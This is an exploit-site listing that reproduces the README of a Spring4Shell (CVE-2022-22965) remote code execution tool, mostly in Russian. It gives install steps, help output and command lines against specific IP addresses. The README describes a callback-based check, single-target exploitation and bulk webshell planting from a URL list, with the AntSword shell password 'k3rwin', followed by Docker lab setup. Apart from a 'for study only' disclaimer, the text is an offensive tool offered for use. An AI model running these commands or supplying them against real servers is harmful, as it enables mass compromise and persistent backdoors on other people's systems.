Sploitus

Exploit for spring-core-rce

kitploit · 2026-08-25

Exploit Code

MARKDOWN95 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-K3RWIN-SPRING-CORE-RCE
# Spring Core RCE/CVE-2022-22965

> Сфера влияния: Spring Framework и производные фреймворки на JDK>=9
> 
> Ссылка на статью
> 
> **Скрипт предназначен только для изучения. Автор не несет ответственности за любое другое использование.**

## 1.Установка

root@kitploit:~
    
    
    pip3 install -r requirements.txt
    

## 2.Использование

root@kitploit:~
    
    
    $ python3 spring-core-rce.py -h
    
     .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
    { {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
    .-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
    `----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'
    
    
                                                     Spring framework Core RCE
                                                                      By:K3rwin
    usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
    
    Spring framework Core 0day RCE 帮助指南
    
    optional arguments:
      -h, --help            show this help message and exit
      -u URL, --url URL     指定url
      -s SYSTEM, --system SYSTEM
                            指定目标主机操作系统,默认linux,参数为win/linux
      -r FILE, --file FILE  指定url文件,批量写马
    

## 3.Пример

> Неразрушающее обнаружение
> 
> -u,--url или используйте -f,--file для массового сканирования
> 
> -c,--check, укажите собственный HTTP-сервер, можно быстро создать веб-сервер с помощью `python3 -m http.server 80`
> 
> В основном используется во внутренней сети, когда требуется неразрушающее обнаружение уязвимости.

root@kitploit:~
    
    
    python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"
    

![image-20220422153433867](https://assets.kitploit.com/production/public/readmes/27791/1d74b66e4ccdaea024a457c90cc73484c4ea4c73312324ebc10acda76e5509d9.png)

> Используйте -u, чтобы указать URL, -s, чтобы указать ОС. Параметры: linux или win, по умолчанию linux.

root@kitploit:~
    
    
    python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"
    

![image-20220331203209702](https://assets.kitploit.com/production/public/readmes/27791/f52f5ec64115411794f36765c0d0b777aca8e77b7601a61fbb79bccb4b5b1599.png)

![image-20220331203858753](https://assets.kitploit.com/production/public/readmes/27791/30d8094fa6ca1f5451f5889900ba51b3d365fae0f3b220dabef6699e03012ed2.png)

> Используйте -r для массовой записи шелл-кода, подключение через AntSword, пароль: k3rwin.

root@kitploit:~
    
    
    python3 spring-core-rce.py -r "urls.txt"
    

![image-20220402112140568](https://assets.kitploit.com/production/public/readmes/27791/9ca2640692286622dfc8037f1dcc93dd12436380cfc8626677720cd4887bebcf.png)

![image-20220402112349943](https://assets.kitploit.com/production/public/readmes/27791/b0975b8de0335ee440602ae81fe04c80b7f5468fa659d3a268a77463ace05ccb.png)

## 4.Целевая среда

### ①.Локальная настройка Docker-полигона:

`docker pull vulfocus/spring-core-rce-2022-03-29:latest`

`docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29`

### ②.Онлайн-полигон